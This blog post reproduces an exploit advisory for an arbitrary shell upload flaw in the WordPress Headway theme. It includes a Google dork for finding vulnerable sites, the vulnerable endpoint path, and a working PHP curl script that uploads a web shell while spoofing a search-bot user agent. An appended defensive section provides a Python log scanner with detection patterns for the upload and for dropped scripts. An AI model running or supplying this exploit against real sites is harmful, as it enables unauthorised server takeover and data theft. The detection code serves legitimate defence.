Wordpress Headway Themes Shell Upload Vulnerability
#-Title: Wordpress Headway Themes Shell Upload Vulnerability
#-Author: Anonymously
#-Date: 10/27/2015
#- Vendor : headwaythemes. com
#- Developer : Clay Griffith
#- Link Download : headwaythemes. com/pricing/
#-Google Dork: inurl:wp-content/themes/headway-(random)
#- Tested on : Trusty Tahr
#- Fixed in ??
==========================================================================
· Vulnerability : /wp-content/themes/headway-(random)/library/visual-editor/lib/upload-header.php
· When Vulnerable : /home/localhost/public_html/
Proof Of Concept :
Tools Coded by Mr.MaGnoM
<?php
/*
link of tool with video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
coded by mr magnom
more tools visit my blog ==> magsec.blogspot.com :)
so why i didn't make auto exploiter because theme headway doesn't have one name
for example u will find /headway-2014/ and /headway-2015/ or /headway-163/ , /headway-120/
so is so difficult to make auto exploiter so u must check firstly complete name of theme then
write it on site.com/wp-content/themes/headway(complete name)/library/visual-editor/lib/upload-header.php
shell go to : site/wp-content/uploads/headway/header-uploads/shell is stable for all site
that script on php for exploit site by site :/
to understand good watch video : http://magsec.blogspot.com/2015/10/wordpress-headway-upload-shell-exploit.html
*/
$url="3xploi7.id"; // link here
$file="lolz.php "; // ur shell here
$post = array('Filedata'=>"@$file") ;
$ch = curl_init();
curl_setopt ($ch, CURLOPT_URL, "$url");
curl_setopt ($ch, CURLOPT_USERAGENT, "msnbot/1.0 (+http://search.msn.com/msnbot.htm)");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,$post);
curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt ($ch, CURLOPT_FOLLOWLOCATION, 1);
$data = curl_exec($ch);
curl_close($ch);
//print $data;
if($data=="1"){
echo "\nexploited\nshell : site/wp-content/uploads/headway/header-uploads/$file \n";
}else{
echo "\nnot infected\n";
}
?>
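For defenders, the two paths named in this advisory (the upload-header.php endpoint and the header-uploads directory) work directly as access-log indicators. The scanner below is an added example, not part of the original post or the tool above; it assumes Apache/nginx combined log format, and the sample log lines, IP addresses and file names are constructed.

```python
import re

# Paths come from the advisory; the "headway-..." directory suffix differs per site.
UPLOAD_ENDPOINT = re.compile(
    r"^/wp-content/themes/headway[^/]*/library/visual-editor/lib/upload-header\.php",
    re.I)
# Script-type files requested from the directory the advisory names as the drop location.
DROPPED_SCRIPT = re.compile(
    r"^/wp-content/uploads/headway/header-uploads/[^?]*\.(?:php\d?|phtml|phar)(?:[/?]|$)",
    re.I)
# Combined log format: ip ident user [time] "METHOD path PROTO" status ...
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

def scan(lines):
    """Return (kind, ip, path, status) for each request matching an indicator."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue  # not a combined-format request line
        ip, _ts, method, path, status = m.groups()
        if method == "POST" and UPLOAD_ENDPOINT.match(path):
            findings.append(("upload-post", ip, path, int(status)))
        elif DROPPED_SCRIPT.match(path):
            kind = "script-served" if status == "200" else "script-requested"
            findings.append((kind, ip, path, int(status)))
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [27/Oct/2015:10:01:02 +0000] "POST /wp-content/themes/headway-163/library/visual-editor/lib/upload-header.php HTTP/1.1" 200 1 "-" "msnbot/1.0"',
    '203.0.113.7 - - [27/Oct/2015:10:01:09 +0000] "GET /wp-content/uploads/headway/header-uploads/example.php?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [27/Oct/2015:10:05:00 +0000] "GET /wp-content/uploads/headway/header-uploads/logo.png HTTP/1.1" 200 20480 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [27/Oct/2015:10:06:00 +0000] "GET /wp-content/uploads/headway/header-uploads/old.PHP5 HTTP/1.1" 404 0 "-" "curl/7.35"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A "script-served" finding means the web server answered 200 for a script file inside an upload directory, which should never hold executable content; configuring the server to refuse script execution under wp-content/uploads removes that step regardless of the theme version.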
You are now reading the article Wordpress Headway Themes Shell Upload Vulnerability at the link address https://ware-id.blogspot.com/2015/10/wordpress-headway-themes-shell-upload.html